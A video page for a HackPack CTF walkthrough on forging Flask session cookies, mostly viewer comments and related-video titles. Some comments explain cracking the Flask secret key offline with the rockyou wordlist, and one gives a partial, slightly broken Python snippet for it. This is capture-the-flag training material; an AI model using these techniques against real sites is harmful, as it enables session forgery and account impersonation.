HackPack CTF - Forging Python Flask Session Cookies

Показать описание

Рекомендации по теме

Комментарии

Just a small comment, you could just offline brute force the secret key using the original session cookie you get from the site and compare it to what you generate, this way you don't need to brute force the remote server and it will make brute forcing faster (because it's not over the network).
Aside from that, great video as always, thanks alot for what you are doing for the community, you are awesome!

sysclls

I’m learning so much from this channel. Thanks so much.

-willplaysgames

you make me wanna go learn python so hard right now after seeing the power of this programming language

mostafanasser

Wonderful video thanks, this walkthrough helped me to solve picoctf "more cookies" challenge which is based on flask cookie...

viv_

Also we can observe the header values, server:meinheld/1.0.1, so we can deduct that certainly at the backend a sandboxed python backend must be at work, this could be an python sandbox vulnerability or SSTI .

IAmOxidised

This is awesome. I like the way you get going with things and find out the right path. I like your python skills man. I do love python but i am merely a beginner. Keep doing such videos. Thank you very much 😊

crassProgrammer

Very new to pretty much all of this ... seems to slowly makes sense very fun to watch and informative 👍

tricky

I really loved your videos.. its worth watching.. kudos to your programming skills.. keep doing more.. keep entertaining and encouraging us.. Love from INDIA

manoharbaratam

I just discovered you some days ago and I love your content. It's not the area I work, but who knows in future? Anyway, knowledge is knowledge, right? Keep up the good work.

arcanj

I thought for sure this was going to be a situation where they don't verify the signature, so you could just set the flagship key to true in Burp and be on your way. But it was great seeing your python script!

wilcosec

You could have verified the signature offline, only the correct secret will generate a valid signature.

Vogel

Any possibility of going over how to complete this without brute force? I'd be very interested in seeing that :)

Also, yeah, a lot of people have mentioned it already, but offline has verification probably would've been cleaner. Overall, great vid. Love your content

kalelsoffspring

I thought you said there was no brute forcing? Did I mishear?

GeekBatman

I did those Pico ctf flask ones. You don't actually need to send it to the server over and over again. Because you have a cookie, you can just take the data out of the cookie then sign it with all of the Rock you passwords, and check to see if the token you get from signing it is equal to the token the website gave you. Once you have the secret key that way, then you can forge a different one and send only one request back to the server.

It's still brute-forcing, but you don't need to hammer the server. Also it's like a million times faster to do it locally. If the password had been the 10 millionth one in rockyou.txt, hammering the server would take too long.

Am I explaining that clearly?

lordtony

Nicee. i wasnt able to do it. Now i know how to do it :)

daanbreur

How in the hell did you learn all this stuff? Just WOW. Very impressive. I feel dumb, just watching. lol

CybrJames

Any websites like THM, HTB and HackPack CTF? thx.

passivecryptoearnings

Is it possible to solve those challagnes today? Or the competition has ended and they are no longer available?

Andrei-dsqv

You can bruteforce it locally by doing this:

from itsdangerous import Signer
import hashlib
#Load rockyou.txt
wanted_signature = #The last part of the cookie (SIGNATURE)
encoded_plus_timestamp = #First part of the cookie
for password in rockyou:
s = Signer(password, salt="cookie-session", key_derivation="hmac", digest_method=hashlib.sha1) #Found the params though some source digging :)
if == wanted_signature:
print(f"Secret key is: {password}!")
break

This is much faster and there is no need to hammer the server :)

_sp

Great vid, but for the love of God please choose either single or double quotes

theohenson

HackPack CTF - Forging Python Flask Session Cookies

HackPack CTF - Forging Python Flask Session Cookies

Python Flask App H.A.C.K.E.D - Basilic CTF Ep1

GuidePoint Security CTF - Forging Cookies and User Impersonation

[CTF write up] Hackpack 2020 | WEB | Super Secret Flag Vault | MD5 hash decrypt

GuidePoint Security CTF - Using Python Requests to Get and Return Data

Python Jail Escape and RCE on a Flask App - Basilic CTF Ep2

Installing Katana - Automatic CTF Solver

Modifying Python Code (PicoCTF 2022 #18 'patchme.py')

Deobfuscating Python Code (PicoCTF 2022 #30 'bloat.py')

HackPack CTF 2020 - Treasure

SSRF & Python Debugger - Forge @ HackTheBox

HASHING WITH PYTHON (RINGZERO CTF CHALLENGE )

web hacking: python Jinja2 SSTI vulnerability and code execution

DANGEROUS Python Flask Debug Mode Vulnerabilities

Python Challenge! 17 COOKIES

SnykCon CTF - Sauerkraut - Python Pickle Vulnerabilities

One day in life: ctf challenge @ cybersecurity 🚩

Pwn2 CSCG2020 [CTF-Challenge Walkthrough]

TryHackMe! Wonderland - Python Module Manipulation & Capabilities

RootMe - CTF - Walkthrough - TryHackMe! - Python Privilege Escalation

All-Army Cyberstakes! Shamir Secret Schemes

super 754 making a cookie

Modular Inverses in Python 3 (PicoCTF 2022 #03 basic-mod2)

BCACTF - LISP 'Thspeaking' (with SinisterMatrix!)